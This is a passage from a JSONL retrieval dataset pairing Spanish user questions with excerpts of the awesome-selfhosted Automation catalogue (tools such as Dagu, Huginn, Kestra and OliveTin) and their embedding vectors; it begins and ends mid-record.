0.0528, -0.00318, -0.09066, -0.03324, -0.095, -0.07678, 0.04158, -0.06534, -0.04119, -0.00693, 0.04884, 0.0093, -0.02548, -0.03878, -0.0581]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Cronmaster β€” Cronjob management UI with human readable syntax, live logging and log history for your cronjobs [AGPL-3.0, Docker]. Dagu β€” Powerful Cron alternative with a Web UI. It allows you to define dependencies between commands as a Directed Acyclic Graph (DAG) in a declarative YAML format [GPL-3.0, Go/Docker]. Discount Bandit β€” Track pricing, stock status of products across multiple stores such as Amazon, Ebay, Walmart, etc [⚠, GPL-3.0, PHP/Docker]. Dittofeed β€” Omni-channel customer engagement and messaging automation platform (alternative to Braze, Customer.io, Iterable) [MIT, Docker]. feedmixer β€” Micro web service which takes a list of feed URLs and returns a new feed consisting of the most recent n entries from each given feed (returns Atom, RSS, or JSON) [WTFPL, Python]. flowctl β€” Self-service workflow execution platform with approvals, remote execution and scheduling [Apache-2.0, Go/Docker].", "indexar": "cual es una alternativa libre a plataformas como Braze o Customer.io para automatizar mensajes a clientes?", "v": [0.01983, 0.10838, -0.01655, -0.07058, -0.09537, -0.14313, -0.05496, -0.09408, -0.1886, -0.09455, -0.06085, -0.1845, 0.03885, 0.07543, 0.09517, 0.00477, 0.0554, 0.02699, 0.05365, 0.02323, 0.07143, -0.0014, -0.13609, -0.08409, -0.13159, -0.04374, -0.037, 0.0126, -0.18468, 0.06714, 0.00181, -0.16374, 0.10456, -0.02152, 0.03403, -0.09364, 0.12216, 0.11647, 0.04755, 0.03784, 0.07232, -0.02143, -0.01457, 0.04119, 0.10082, 0.04349, 0.00813, 0.0518, 0.02822, 0.03223, -0.08543, -0.07324, -0.15418, 0.02783, 0.05846, -0.00672, 0.24313, -0.10907, 0.06588, -0.06537, -0.00652, 0.04824, 0.11063, 0.03985, -0.02161, 0.01323, 0.0945, -0.03587, -0.02486, 0.11286, 0.06393, 0.03233, 0.00462, -0.02119, -0.00311, 0.17435, -0.08365, 0.03428, -0.09725, 0.07686, 0.0479, -0.05678, -0.09842, 0.00532, -0.01742, -0.05554, 0.02189, -0.05772, -0.03056, -0.00865, 0.09229, -0.00186, 0.03063, 0.11394, 0.01915, -0.08522, -0.0239, -0.04412, -0.04807, 0.05722, -0.01935, 0.03065, -0.09495, 0.03863, -0.06001, -0.04144, 0.01323, -0.07425, -0.03449, 0.009, 0.03895, -0.04991, 0.0887, 0.00096, -0.03764, -0.04656, 0.02085, -0.01329, 0.08171, 0.02798, -0.05065, 0.02341, 0.06972, -0.0673, 0.02972, 0.05479, 0.00336, 0.06443, -0.04719, -0.02629, -0.01595, -0.05573, -0.06521, -0.09617, -0.02272, 0.03937, 0.11307, -0.01438, -0.01586, -0.00675, -0.0383, 0.08081, -0.02161, -0.04848, 0.129, -0.08418, -0.04393, -0.11469, -0.02229, 0.0384, 0.00712, 0.01737, -0.02983, 0.00754, -0.04796, -0.0554, 0.03514, -0.01613, -0.02416, 0.11093, 0.05149, -0.05786, 0.01508, 0.07595, 0.00487, -0.03579, -0.04679, 0.08736, -0.01018, 0.00124, 0.01331, 0.06445, 0.085, -0.0614, 0.0131, -0.00911, 0.00749, -0.0059, -0.04457, -0.05566, -0.00464, -0.00104, -0.00184, -0.0023, 0.01917, -0.04914, 0.03809, -0.02327, 0.03257, 0.09997, -0.07847, 0.01567, -0.11608, -0.0307, 0.02391, 0.00116, -0.04095, -0.04339, -0.01638, -0.03469, -0.05865, -0.0292, 0.00088, -0.05701, -0.06751, 0.03364, -0.01375, 0.01638, 0.02588, 0.01302, 0.04823, -0.06113, 0.09502, -0.0305, -0.02393, -0.02782, 0.01536, -0.05862, -0.00911, -0.03764, 0.00195, 0.02549, -0.02911, -0.01272, -0.07156, 0.09208, 0.03782, 0.09275, -0.01597, 0.00134, -0.01391, -0.00739, -0.03461, 0.03366, 0.0393, 0.00016, 0.02384, -0.03502, -0.01516, -0.08158, 0.0332, 0.05257, 0.04176, -0.0115, -0.01236, -0.00835, -0.08382, -0.00628, -0.06284, -0.0353, -0.02075, 0.00564, 0.02777, -0.01465, 0.02959, -0.02667]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Fredy β€” Searches for new apartments, houses, and flats in Germany on platforms like ImmoScout24, Immowelt, and others, and instantly delivers the results to you via Slack, Telegram, and more [⚠, Apache-2.0, Nodejs/Docker]. gocron β€” Task scheduler that allows users to specify recurring jobs via a simple YAML configuration file [MIT, Docker]. HandBrake Web β€” Use one or more instances of HandBrake video transcoder on a headless device via a web interface [AGPL-3.0, Docker]. Healthchecks β€” Listen for pings and sends alerts when pings are late [BSD-3-Clause, Python/Docker]. HomeButler β€” Homelab management tool for monitoring hosts, Docker services, Wake-on-LAN, inventory, and remote operations, with a web dashboard and MCP integrations [MIT, Docker/Go]. Huginn β€” Build agents that monitor and act on your behalf [MIT, Ruby]. Kestra β€” Event-driven, language-agnostic platform to create, schedule, and monitor workflows. In code. Coordinate data pipelines and tasks such as ETL and ELT [Apache-2.0, Docker].", "indexar": "que herramienta me permite crear agentes para vigilar y actuar por mΓ­ mismo", "v": [-0.02254, 0.11962, -0.21997, -0.13432, 0.0426, -0.01518, -0.07705, 0.05003, -0.08635, -0.08752, 0.11372, -0.06568, 0.03323, -0.01906, 0.24306, 0.0744, 0.03518, -0.10556, 0.03597, 0.16911, 0.068, 0.00347, -0.00908, -0.05913, -0.07496, -0.05808, 0.06465, -0.06293, -0.05558, 0.10033, -0.07193, 0.10425, 0.02761, -0.06084, 0.03821, -0.10887, -0.09407, 0.00087, 0.05735, 0.09003, -0.07163, 0.02822, -0.06839, 0.05343, 0.08703, 0.07308, -0.06513, -0.08906, 0.03949, 0.16785, 0.02561, -0.03886, -0.14849, 0.0091, 0.01242, -0.093, 0.14182, -0.09877, 0.00895, -0.18762, -0.04891, 0.06147, -0.03614, -0.05307, 0.02516, 0.00703, 0.09927, -0.09019, -0.07551, 0.06761, -0.05838, -0.08344, 0.06183, 0.0871, -0.01129, -0.09932, 0.01886, -0.09673, -0.02899, -0.03387, 0.01231, 0.03175, -0.09091, 0.05918, 0.02421, -0.13165, 0.05553, -0.03325, -0.06582, -0.04033, 0.02564, 0.01858, 0.02323, -0.04243, 0.00083, 0.01532, 0.10331, -0.09088, -0.01337, 0.0118, 0.18336, -0.13526, -0.13246, 0.01987, 0.04154, -0.05845, -0.08635, 0.00879, -0.06314, -0.02225, 0.04931, 0.02913, 0.00066, -0.01245, 0.03427, 0.0702, -0.02345, -0.03315, -0.00042, 0.00087, 0.03998, -0.00528, -0.1197, -0.04202, 0.06779, -0.04673, -0.04478, 0.04589, -0.05777, -0.0854, -0.04371, -0.04725, -0.07529, -0.00775, 0.01862, 0.0278, -0.06396, -0.05928, -0.01631, 0.0163, -0.04293, 0.00231, 0.03094, -0.09295, 0.06481, 0.02977, -0.01847, -0.02296, -0.02391, -0.01171, 0.00751, -0.00452, -0.05434, 0.03725, -0.06806, 0.0831, -0.0178, -0.00913, -0.07405, 0.01297, -0.02476, -0.01492, 0.01977, -0.00073, 0.02526, -0.05864, 0.06163, -0.027, 0.04857, 0.05113, -0.00566, -0.03557, 0.07999, -0.06651, 0.08001, -0.0328, -0.0318, -0.04537, 0.01428, -0.07851, 0.0351, -0.04146, -0.01604, -0.05477, 0.0288, -0.06071, -0.01145, 0.03921, -0.00689, 0.0699, 0.01256, 0.06945, 0.03644, -0.02881, 0.01906, 0.00998, 0.02525, -0.09965, 0.05353, -0.02522, 0.02579, -0.06241, 0.03925, -0.05227, 0.01211, 0.02994, -0.03287, 0.04904, 0.01056, 0.0066, 0.01676, 0.00923, 0.04951, -0.02817, 0.0094, 0.03455, 0.02362, 0.0088, -0.03799, -0.00275, 0.00792, -0.00959, -0.0106, -0.0157, -0.03109, -0.02143, -0.05042, 0.04157, 0.03855, 0.00892, 0.00283, -0.09541, -0.01127, -0.00772, -0.00078, -0.08418, 0.01276, -0.04885, -0.02454, -0.0375, -0.01118, 0.03661, 0.03512, -0.05758, -0.01493, -0.03999, 0.03527, 0.03099, -0.05923, -0.06767, 0.00178, 0.00822, 0.09374, -0.01526, 0.02467, -0.07323]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Fredy β€” Searches for new apartments, houses, and flats in Germany on platforms like ImmoScout24, Immowelt, and others, and instantly delivers the results to you via Slack, Telegram, and more [⚠, Apache-2.0, Nodejs/Docker]. gocron β€” Task scheduler that allows users to specify recurring jobs via a simple YAML configuration file [MIT, Docker]. HandBrake Web β€” Use one or more instances of HandBrake video transcoder on a headless device via a web interface [AGPL-3.0, Docker]. Healthchecks β€” Listen for pings and sends alerts when pings are late [BSD-3-Clause, Python/Docker]. HomeButler β€” Homelab management tool for monitoring hosts, Docker services, Wake-on-LAN, inventory, and remote operations, with a web dashboard and MCP integrations [MIT, Docker/Go]. Huginn β€” Build agents that monitor and act on your behalf [MIT, Ruby]. Kestra β€” Event-driven, language-agnostic platform to create, schedule, and monitor workflows. In code. Coordinate data pipelines and tasks such as ETL and ELT [Apache-2.0, Docker].", "indexar": "cual programa puedo usar para programar tareas recurrentes fΓ‘cilmente", "v": [0.11522, 0.14486, -0.16134, -0.11489, 0.07902, -0.06355, 0.06967, -0.01977, -0.11389, -0.04153, -0.12242, 0.00143, 0.00725, -0.04585, -0.00609, 0.07733, 0.07379, -0.04603, 0.04623, -0.0018, 0.00935, -0.03016, -0.10093, -0.02527, -0.06968, 0.06393, 0.05867, -0.09132, -0.08442, -0.01486, -0.01246, 0.05743, 0.16823, -0.21853, -0.05393, 0.0406, -0.02187, 0.05282, 0.00438, 0.05218, 0.03303, 0.08118, -0.123, 0.02238, 0.09299, 0.0442, 0.12276, -0.06011, -0.03867, -0.03844, -0.03167, 0.01818, -0.0291, -0.00781, 0.07094, -0.07357, 0.05244, -0.12182, -0.12601, -0.02494, 0.02424, 0.08667, 0.02279, -0.02893, 0.02205, -0.04471, 0.09713, -0.02235, -0.06172, 0.05772, 0.00949, 0.09397, 0.0006, -0.01831, 0.00168, 0.05496, -0.03586, -0.11204, 0.0813, -0.01553, -0.06167, -0.0005, 0.03564, 0.08508, -0.07657, -0.09637, 0.04568, -0.04252, 0.01365, -0.07319, -0.03463, 0.0264, 0.00708, 0.05688, 0.12832, 0.00271, 0.15462, 0.11558, 0.02681, 0.07129, 0.06902, -0.10653, -0.0438, 0.1498, -0.10652, 0.06195, 0.0489, -0.01697, -0.04571, -0.01833, -0.02705, -0.09327, -0.11936, -0.06466, -0.0669, 0.02957, -0.025, -0.05148, 0.09115, -0.08827, -0.03833, 0.0849, -0.01135, 0.04151, 0.12803, -0.02214, 0.05045, 0.1192, -0.07835, 0.03917, 0.02424, 0.00859, -0.02742, -0.03464, -0.09023, 0.00249, 0.06654, -0.07599, 0.00079, -0.0695, 0.03873, 0.06557, 0.01778, 0.03225, 0.05014, 0.08217, 0.02293, -0.05303, -0.00944, 0.03711, 0.04904, 0.01076, 0.00232, 0.08886, -0.07838, -0.03842, 0.01897, -0.00705, -0.05968, 0.01733, -0.10225, -0.00108, -0.00548, -0.01561, 0.01867, -0.10375, 0.02308, 0.03739, 0.04851, 0.09407, -0.00924, 0.06936, 0.06393, -0.09738, 0.05368, -0.07491, -0.00761, -0.04273, -0.00648, -0.0234, -0.10852, 0.0981, 0.05237, 0.0077, -0.01909, -0.04891, -0.01414, 0.06996, -0.02408, 0.00234, -0.04134, 0.01015, 0.01719, -0.06666, 0.02259, -0.024, -0.04908, -0.04624, -0.0141, -0.05893, -0.03718, 0.02103, -0.02543, 0.0065, 0.09613, 0.0899, -0.0597, 0.02277, 0.06105, 0.10861, 0.00895, -0.07598, 0.05838, 0.03874, -0.04156, -0.01098, -0.03316, -0.00862, 0.05574, 0.04729, 0.01815, -0.01489, 0.0487, 0.0285, 0.04443, -0.05666, 0.04187, 0.06871, 0.01934, 0.04299, -0.04449, -0.00451, -0.02985, -0.06407, -0.00346, -0.01599, -0.03691, -0.0549, 0.01084, -0.04495, -0.00404, 0.06747, -0.00429, -0.06643, -0.03469, 0.01124, -0.07584, -0.01122, -0.07354, 8e-05, -0.04444, 0.04588, 0.02466, -0.05027, 0.03102, 0.01822]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Fredy β€” Searches for new apartments, houses, and flats in Germany on platforms like ImmoScout24, Immowelt, and others, and instantly delivers the results to you via Slack, Telegram, and more [⚠, Apache-2.0, Nodejs/Docker]. gocron β€” Task scheduler that allows users to specify recurring jobs via a simple YAML configuration file [MIT, Docker]. HandBrake Web β€” Use one or more instances of HandBrake video transcoder on a headless device via a web interface [AGPL-3.0, Docker]. Healthchecks β€” Listen for pings and sends alerts when pings are late [BSD-3-Clause, Python/Docker]. HomeButler β€” Homelab management tool for monitoring hosts, Docker services, Wake-on-LAN, inventory, and remote operations, with a web dashboard and MCP integrations [MIT, Docker/Go]. Huginn β€” Build agents that monitor and act on your behalf [MIT, Ruby]. Kestra β€” Event-driven, language-agnostic platform to create, schedule, and monitor workflows. In code. Coordinate data pipelines and tasks such as ETL and ELT [Apache-2.0, Docker].", "indexar": "con que puedo gestionar la infraestructura de mi laboratorio domΓ©stico desde un panel web", "v": [0.0041, 0.00657, -0.13473, -0.28265, -0.07672, -0.03242, 0.03283, 0.04693, -0.17253, -0.11467, -0.06907, -0.03398, -0.02767, -0.04002, -0.00115, 0.08988, 0.04479, -0.17499, -0.11463, -0.01012, -0.11747, 0.08907, -0.0496, 0.10365, 0.01858, -0.05804, 0.09953, -0.14182, -0.17268, 0.05721, 0.03047, 0.1102, -0.00252, -0.02711, -0.0781, -0.01096, -0.02856, 0.08399, 0.00189, -0.01607, -0.0119, -0.03268, -0.03947, -0.01255, 0.09067, -0.05268, 0.02749, -0.15284, -0.03902, -0.07817, -0.16816, -0.02958, -0.00492, 0.03642, -0.00633, 0.02331, 0.09628, -0.12942, 0.15807, 0.00193, -0.03486, 0.02715, 0.0367, 0.06092, 0.00125, -0.01068, -0.10301, 0.00794, -0.08376, 0.02641, -0.01715, 0.05264, -0.03458, -0.06534, -0.02207, 0.01098, -0.056, 0.06373, 0.04877, -0.01697, 0.02112, 0.05565, -0.02359, 0.03921, -0.02731, -0.04254, -0.00507, -0.08658, 0.02418, -0.05348, -0.08645, -0.05141, -0.06765, -0.0245, 0.03149, -0.00845, 0.1, 0.08167, -0.02092, -0.04607, 0.06364, 0.08865, -0.0768, 0.12805, 0.07448, 0.05927, -0.00304, -0.04311, -0.01646, -0.10119, -0.05258, 0.08407, 0.00643, -0.11918, -0.02979, 0.05871, -0.08862, -0.0483, -0.04716, -0.0996, -0.06212, -0.05402, 0.03995, -0.03546, 0.00367, -0.03481, 0.16226, 0.00479, 0.04999, 0.00047, 0.04807, 0.03929, 0.00603, 0.03662, 0.04994, 0.08541, -0.10277, -0.06848, -0.017, -0.03453, 0.03442, 0.10625, -0.01651, -0.02154, 0.0451, -0.01557, -0.05035, -0.08905, -0.04477, 0.01374, -0.03628, -0.01657, -0.01365, 0.03534, -0.06506, 0.03341, 0.09227, -0.02495, -0.07632, 0.06774, -0.08656, -0.0045, -0.01208, 0.04203, -0.01754, 0.12351, -0.04416, 0.02686, 0.00949, 0.02397, -0.04355, 0.07885, -0.08816, -0.01986, 0.05525, 0.00776, -0.00409, -0.08603, 0.06102, -0.07095, -0.09984, 0.02825, -0.03917, 0.02853, -0.04548, 0.05214, -0.02571, 0.00952, 0.04043, 0.06473, 0.06136, 0.0065, -0.02457, 0.03715, 0.02765, -0.04802, -0.02525, -0.0311, 0.01212, 0.02322, -0.03913, -0.01288, 0.0431, -0.01372, -0.02267, 0.08464, -0.01944, -0.00103, -0.0146, 0.0147, 0.08256, -0.00228, 0.06805, -0.08361, -0.04224, 0.03511, 0.04152, -0.02638, -0.0048, 0.04956, 0.06305, 0.00765, -0.06494, 0.00447, -0.04496, 0.03728, -0.00448, -0.00336, 0.0358, 0.01442, -0.02059, 0.06223, 0.04084, 0.00512, 0.02659, 0.00515, 0.01581, -0.0747, -0.06067, 0.05448, 0.023, 0.10335, -0.03339, -0.04558, 0.00913, -0.03948, -0.05426, 0.02668, 0.02456, -0.03561, -0.00839, 0.0011, 0.01144, -0.05656, 0.01011, 0.0077]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Kibitzr β€” Lightweight personal web assistant with powerful integrations [MIT, Python]. LazyLibrarian β€” Follow authors and grab metadata for all your digital reading needs. It uses a combination of Goodreads, Librarything and optionally GoogleBooks as sources for author info and book info [⚠, GPL-3.0, Python]. Leon β€” Personal assistant who can live on your server [MIT, Nodejs]. Matchering β€” Automated music mastering (alternative to LANDR, eMastered and MajorDecibel) [GPL-3.0, Docker]. Mylar3 β€” Automated Comic Book (cbr/cbz) downloader program for use with NZB and torrents [GPL-3.0, Python/Docker]. OliveTin β€” Web interface for running Linux shell commands [AGPL-3.0, Go]. pyLoad β€” Lightweight, customizable and remotely manageable downloader for 1-click-hosting sites like rapidshare.com or uploaded.to [AGPL-3.0, Python].", "indexar": "que programa sirve para gestionar mis bibliotecas de lectura y obtener metadatos", "v": [0.02471, 0.04527, -0.12204, -0.18945, 0.07771, -0.13374, -0.07422, 0.04072, -0.09821, -0.13175, -0.04173, -0.05703, 0.04914, -0.00247, 0.04852, 0.00391, 0.12539, -0.0919, 0.04805, -0.0551, 0.08764, 0.11317, 0.022, 0.04911, -0.03062, -0.01885, 0.06909, -0.11749, 0.05654, 0.17529, -0.05202, 0.00048, 0.04271, -0.11175, 0.05125, 0.03101, 0.02558, 0.07044, -0.01475, -0.01279, 0.00622, 0.17188, 0.04611, 0.02262, 0.00148, -0.10317, 0.12832, 0.0162, -0.04952, 0.03443, -0.04547, 0.00311, -0.03556, -0.00321, 0.0578, -0.02553, -0.04228, -0.09563, -0.08435, -0.03723, -0.08971, 0.03691, 0.05906, -0.10842, 0.17842, -0.04231, 0.07969, 0.04932, -0.0959, 0.10719, -0.09309, 0.03854, 0.03984, 0.04159, -0.09614, 0.01555, -0.02341, -0.00241, 0.09875, -0.02064, 0.04352, -0.05942, -0.05554, 0.00105, -0.03273, -0.02431, 0.07175, -0.05513, 0.01725, 0.05567, -0.05125, 0.02676, -0.07057, -0.0393, 0.0704, -0.01285, 0.07283, -0.05105, -0.00838, 0.0929, 0.01366, -0.03199, -0.05815, 0.10974, -0.06557, 0.01423, -0.05842, -0.07592, 0.04646, -0.04034, 0.02834, -0.03089, 0.05001, -0.04632, -0.04436, 0.05368, 0.07244, -0.019, 0.09188, 0.02299, -0.21263, -0.04077, -0.04382, -0.02247, 0.11403, 0.05979, 0.09952, 0.07208, 0.00869, 0.05469, 0.00151, -0.01813, -0.03877, -0.00979, -0.09684, -0.0631, -0.02742, -0.10888, -0.03428, -0.07978, 0.01117, 0.05391, -0.00421, 0.05777, -0.01475, -0.10954, 0.0818, -0.00449, 0.03979, -0.02976, -0.03055, -0.06695, 0.05641, 0.03966, -0.04854, 0.0605, 0.05232, -0.07162, -0.11334, 0.00433, -0.04204, -0.00965, 0.01286, -0.03923, -0.02545, -0.03735, -0.01468, 0.0213, 0.13217, 0.03862, -0.09821, 0.03601, -0.03838, -0.03931, 0.0099, -0.0452, -0.03212, -0.02379, 0.03576, 0.06341, -0.1282, -0.02127, 0.02683, -0.03045, -0.08, -0.05378, -0.06831, -0.04389, -0.06212, -0.04771, 0.02697, -0.00536, 0.00034, -0.02698, 0.04096, 0.01211, -0.06553, 0.09351, 0.07882, -0.08735, -0.01147, 0.05454, -0.00678, 0.08808, 0.07572, 0.03529, -0.0349, 0.06607, 0.01725, 0.07183, 0.01344, 0.05751, 0.02549, -0.00151, -0.04944, -0.10113, -0.05058, 0.0444, 0.03815, -0.032, -0.00721, -0.06239, 0.05595, 0.05983, 0.02342, -0.05186, 0.01543, -0.01547, 0.0413, 0.05374, -0.01119, -0.07595, 0.03456, 0.06644, -0.00438, -0.0429, 0.00792, 0.01403, 0.01854, -0.05497, -0.05781, 0.05563, -0.00599, -0.06747, 0.01405, -0.00338, -0.0788, 0.03062, -0.00604, 0.01625, -0.02117, -0.0177, 0.00714, 0.00589, 0.09324, -0.02413]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Kibitzr β€” Lightweight personal web assistant with powerful integrations [MIT, Python]. LazyLibrarian β€” Follow authors and grab metadata for all your digital reading needs. It uses a combination of Goodreads, Librarything and optionally GoogleBooks as sources for author info and book info [⚠, GPL-3.0, Python]. Leon β€” Personal assistant who can live on your server [MIT, Nodejs]. Matchering β€” Automated music mastering (alternative to LANDR, eMastered and MajorDecibel) [GPL-3.0, Docker]. Mylar3 β€” Automated Comic Book (cbr/cbz) downloader program for use with NZB and torrents [GPL-3.0, Python/Docker]. OliveTin β€” Web interface for running Linux shell commands [AGPL-3.0, Go]. pyLoad β€” Lightweight, customizable and remotely manageable downloader for 1-click-hosting sites like rapidshare.com or uploaded.to [AGPL-3.0, Python].", "indexar": "cual es una alternativa libre a LANDR para el mastering musical", "v": [-0.01604, -0.01183, 0.03131, -0.0569, -0.20858, 0.07232, -0.13002, 0.05086, -0.18375, 0.02163, 0.01562, -0.18935, 0.0601, -0.14862, 0.06997, -0.02125, 0.04486, -0.04407, 0.04614, 0.00922, -0.08324, 0.04414, -0.09976, -0.02211, -0.046, -0.12616, 0.03313, -0.04675, -0.11561, 0.0837, 0.02433, 0.0906, -0.00739, 0.00234, -0.03816, -0.04171, 0.16095, 0.18081, 0.05223, 0.01254, -0.05622, -0.05352, -0.02935, 0.06734, 0.01938, -0.09827, 0.03287, 0.09276, 0.00784, 0.09511, -0.04303, 0.1725, -0.01063, 0.036, 0.17995, -0.1191, -0.00756, -0.17871, -0.00879, -0.07529, -0.10518, -0.02989, -0.05019, -0.00411, 0.06534, 0.07725, 0.09657, 0.00501, -0.01477, 0.09508, 0.01738, 0.03942, 0.0507, -0.01631, -0.1464, 0.09575, -0.01416, -0.09052, 0.06067, 0.00527, 0.02401, -0.07492, -0.01185, 0.06346, -0.01745, -0.01305, 0.1296, -0.11546, -0.04657, 0.08743, 0.0652, 0.04003, -0.106, 0.07597, 0.07813, -0.13188, 0.02349, 0.05238, 0.018, 0.00348, 0.04124, 0.00892, -0.14049, -0.01639, 0.03632, 0.07347, 0.04522, 0.01579, -0.0161, 0.04087, -0.09704, 0.07906, 0.00478, -0.01935, -0.03783, -0.08006, 0.0042, 0.00938, -0.02057, 0.0615, 0.00556, 0.01595, -0.0059, -0.06684, 0.00167, 0.02297, 0.05687, 0.03095, -0.00911, 0.03338, 0.08692, -0.04411, -0.00492, -0.07062, -0.001, -0.07398, 0.0921, -0.06838, 0.03401, 0.02495, 0.03763, 0.05285, 0.03314, -0.04185, 0.05091, -0.03203, 0.06047, -0.01996, 0.01445, 0.00478, -0.11411, 0.08792, -0.1086, 0.04134, -0.05156, 0.0709, -0.02605, 0.02716, -0.0585, 0.00818, -0.02276, 0.02446, -0.00877, -0.03566, -0.01327, 0.01236, -0.03028, 0.00664, -0.01472, -0.0238, -0.0487, 0.06773, 0.09309, -0.03782, -0.00618, -0.08569, -0.08086, -0.11745, 0.07362, -0.02914, 0.00024, 0.00862, -0.04522, -0.01211, 0.05377, -0.02156, 0.01136, -0.0378, -0.00108, 0.00274, -0.04584, 0.01362, -0.03763, -0.02449, 0.02963, -0.02838, -0.02988, -0.09034, -0.10325, 0.04723, -0.06486, -0.05849, -0.03723, -0.05593, 0.0409, -0.01484, 0.02284, 0.01365, 0.04733, 0.05701, 0.02652, -0.03691, 0.02068, 0.0377, -0.01623, 0.04147, -0.04693, 0.00313, -0.04396, 0.01624, -0.00539, 0.03514, 0.08185, 0.02513, -0.03762, 0.07119, 0.04905, 0.04758, 0.03717, 0.04142, -0.01797, 0.02537, 0.02508, -0.00252, 0.00486, 0.03786, -0.03906, 0.00096, -0.01762, 0.00657, 0.0823, 0.04376, -0.00834, -0.00852, -0.02516, -0.01294, -0.05142, 0.00464, -0.00317, -0.02159, 0.03506, 0.02881, 0.01827, 0.03134, 0.04458, 0.02157]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: Kibitzr β€” Lightweight personal web assistant with powerful integrations [MIT, Python]. LazyLibrarian β€” Follow authors and grab metadata for all your digital reading needs. It uses a combination of Goodreads, Librarything and optionally GoogleBooks as sources for author info and book info [⚠, GPL-3.0, Python]. Leon β€” Personal assistant who can live on your server [MIT, Nodejs]. Matchering β€” Automated music mastering (alternative to LANDR, eMastered and MajorDecibel) [GPL-3.0, Docker]. Mylar3 β€” Automated Comic Book (cbr/cbz) downloader program for use with NZB and torrents [GPL-3.0, Python/Docker]. OliveTin β€” Web interface for running Linux shell commands [AGPL-3.0, Go]. pyLoad β€” Lightweight, customizable and remotely manageable downloader for 1-click-hosting sites like rapidshare.com or uploaded.to [AGPL-3.0, Python].", "indexar": "como puedo crear un asistente web personal que ejecute comandos en mi servidor", "v": [0.14076, 0.13521, -0.15416, -0.1521, 0.01042, -0.05907, 0.0461, -0.04881, -0.07657, -0.03658, -0.14266, 0.01073, 0.02495, -0.06831, 0.05295, 0.04401, 0.26293, -0.0058, 0.01144, 0.07431, 0.08353, -0.00678, 0.0434, 0.03287, -0.0149, 0.01376, 0.12042, -0.00339, -0.0488, -0.04364, -0.0427, 0.03846, -0.0092, -0.00722, 0.0835, -0.04762, -0.11255, 0.03671, -0.12199, 0.07719, 0.03135, 0.01541, -0.12462, 0.06711, 0.00071, 0.02891, 0.10581, -0.04582, 0.09741, 0.01391, -0.04774, -0.1075, -0.16255, -0.08559, -0.02238, -0.00485, 0.19714, -0.18044, 0.01298, 0.03249, -0.1241, -0.07734, 0.0283, 0.05764, 0.0711, 0.02897, 0.02129, -0.1406, -0.04444, -0.02772, -0.15784, 0.05223, -0.05927, -0.03073, 0.1165, 0.00933, -0.08083, 0.0111, 0.10893, 0.02131, -0.00341, 0.07051, -0.05158, 0.10783, -0.06747, -0.06551, -0.06773, -0.03704, 0.06078, -0.01063, 0.1056, 0.00512, -0.07038, 0.02859, 0.03392, 0.04413, 0.09827, -0.02878, 0.02409, -0.03671, 0.03304, -0.02846, -0.02542, 0.11184, 0.06467, 0.10553, 0.12806, -0.03943, 0.02112, -0.06444, 0.03445, -0.08557, -0.03806, -0.02288, 0.00371, -0.07493, -0.03432, -0.02905, 0.07031, -0.00459, -0.08303, 0.00071, 0.00885, 0.05632, -0.02783, -0.03056, 0.00734, -0.00495, 0.02457, -0.0058, -0.05739, -0.02726, 0.01779, -0.08845, 0.02749, 0.15034, 0.04192, -0.05173, -0.05936, -0.09117, 0.04326, 0.02211, 0.00363, -0.01993, 0.10094, -0.03403, 0.03169, -0.08129, -0.09823, 0.01403, 0.03037, -0.01434, -0.0491, 0.04869, -0.09204, -0.04194, -0.01993, -0.03044, -0.03411, 0.05874, 0.02068, 0.03706, -0.0242, 0.06696, 0.00386, -0.01236, -0.00894, 0.04134, 0.03788, 0.04745, -0.07955, 0.03692, -0.01182, -0.07127, 0.05025, -0.01885, -0.02061, -0.03592, 0.01898, 0.04325, -0.00858, 0.02378, -0.05876, -0.01676, -0.03201, -0.09328, -0.0171, 0.00272, -0.05434, 0.04833, -0.02806, 0.0672, -0.05322, -1e-05, 0.02958, -0.02894, -0.01373, -0.0353, -0.06245, -0.05744, -0.03599, 0.00633, -0.03343, -0.06093, 0.00167, -0.02611, -0.06088, 0.08836, -0.00825, 0.00742, 0.00616, -0.02717, 0.04904, -0.01867, -0.02204, -0.01892, 0.08396, -0.04754, -0.03832, -0.06399, 0.00555, 0.01589, 0.03431, -0.03806, 0.0136, 0.04352, 0.02768, -0.00979, 0.05253, 0.0024, -0.03306, -0.0257, -0.02645, -0.07234, 0.02619, 0.0042, 0.00873, -0.02871, -0.03785, -0.05201, 0.01486, 0.07358, -0.02126, -0.09194, 0.02885, -0.10725, -0.05701, 0.01673, -0.03825, -0.03281, -0.0233, 0.01075, 0.04045, -0.0505, -0.00575, -0.01822]} -{"tipo": "pregunta", "herramienta": "Automation", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Automation", "tema": "automation", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Automation: StackStorm β€” StackStorm (aka _IFTTT for Ops_) is event-driven automation for auto-remediation, security responses, troubleshooting, deployments, and more. Includes rules engine, 